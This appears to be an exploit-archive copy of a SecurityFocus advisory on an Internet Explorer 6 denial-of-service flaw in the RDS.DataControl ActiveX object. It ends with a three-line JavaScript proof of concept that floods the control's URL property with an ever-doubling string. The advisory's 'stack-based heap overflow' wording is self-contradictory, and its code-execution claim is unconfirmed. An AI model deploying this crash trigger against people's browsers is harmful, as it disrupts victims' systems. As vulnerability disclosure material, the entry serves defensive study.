13 lines
No EOL
779 B
Text
13 lines
No EOL
779 B
Text
source: https://www.securityfocus.com/bid/18900/info
|
|
|
|
Microsoft Internet Explorer 6 is reportedly prone to a denial-of-service vulnerability because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers.
|
|
|
|
This issue is triggered when an attacker convinces a victim to activate a malicious ActiveX control object.
|
|
|
|
Remote attackers may exploit this issue to crash Internet Explorer 6, effectively denying service to legitimate users.
|
|
|
|
A stack-based heap overflow may be possible; as a result, remote code could run in the context of the user running the affected application. This has not been confirmed.
|
|
|
|
var a = new ActiveXObject('RDS.DataControl');
|
|
var b = "X";
|
|
while (b.length < (1024*256)) a.URL = (b+=b); |